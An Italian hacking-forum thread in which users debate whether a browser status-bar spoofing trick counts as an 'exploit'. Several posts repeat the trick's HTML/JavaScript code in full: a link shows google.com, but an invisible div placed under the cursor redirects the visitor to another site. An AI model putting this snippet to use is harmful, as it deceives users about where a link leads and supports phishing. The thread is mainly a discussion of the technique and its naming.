[exploit] Offuscare la status bar dei browser
- Autore discussione Predator
- Data d'inizio
- Stato
M
madara
M
madara
appunto... quindi non vedo perchè spacciare questa cosa come una mega vulnerabilità ...
tralaltro qualcuno, diversi anni fa, si è già preso degli insulti per questa cosa:
http://aranzulla.tecnologia.virgilio.it/various-status-bar-spoofing-212.html
http://punto-informatico.it/1261705/PI/News/aranzulla-come-ti-inganno-browser.aspx
tralaltro qualcuno, diversi anni fa, si è già preso degli insulti per questa cosa:
http://aranzulla.tecnologia.virgilio.it/various-status-bar-spoofing-212.html
http://punto-informatico.it/1261705/PI/News/aranzulla-come-ti-inganno-browser.aspx
Ciao. . a me su IE8 non funge mentre su firefox si. .
volevo solo dirti una cosa. . non prendertela come offesa e non prendertela a male. . ma chiamarlo con il nome " exploit " non è una cosa troppo grande? ?
quando poi hai scritto solamente tre righe di html e un po di javascript penso. :
come ti ho già detto non prenderla a male.. anzi spero rimarrai nell'hacking ed imparare insieme a noi. . . ;-)
volevo solo dirti una cosa. . non prendertela come offesa e non prendertela a male. . ma chiamarlo con il nome " exploit " non è una cosa troppo grande? ?
quando poi hai scritto solamente tre righe di html e un po di javascript penso. :
Codice:
<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.infernet-x.com';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<p>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<a href="http://www.google.com" onClick="updatebox(event)"><font
style="font-family:arial;font-size:14px">http://www.google.com</font></a><br>
</body>
</html>come ti ho già detto non prenderla a male.. anzi spero rimarrai nell'hacking ed imparare insieme a noi. . . ;-)
<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.infernet-x.com';" <-- Ottimo trucchetto XD
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<p>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<a href="http://www.google.com" onClick="updatebox(event)"><font
style="font-family:arial;font-size:14px">http://www.google.com</font></a><br>
</body>
</html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.infernet-x.com';" <-- Ottimo trucchetto XD
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<p>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<a href="http://www.google.com" onClick="updatebox(event)"><font
style="font-family:arial;font-size:14px">http://www.google.com</font></a><br>
</body>
</html>
minkia che stronzata.madara ha detto:
hc-4 ha detto:
un exploit, una vulnerabilità , un bug o come caxxo vuoi definirlo non è dettato dalla dimensione del codice o dal tempo che ci si impiega ad ottnerlo, non ci sono dubbi in merito.
ci sono molti exploit che si ottengono (o ottenevano) con un paio di caratteri.
Chiamala come vuoi a me non interessa, ripeto di hacking non so molto pertanto correggi pure la definizione, però danne una
A me risulta che un exploit è il termine che indica lo sfturrare un bug, una vulnerabilià per ottenre fini non previsti dal soggetto in uso. Se cosi' non è ditelo. io crackko software non so la terminologia perfettamente adatta all'hacking.
GreyFox ha detto:
Esatto e si può trasformare in qualcosa di malevolo. Infatti alcuni browser rivelano questo metodo.
Anche l'sql injection è la normale risposta al fuzionamento delle query, giusto?
Ciauz
Predator
- Stato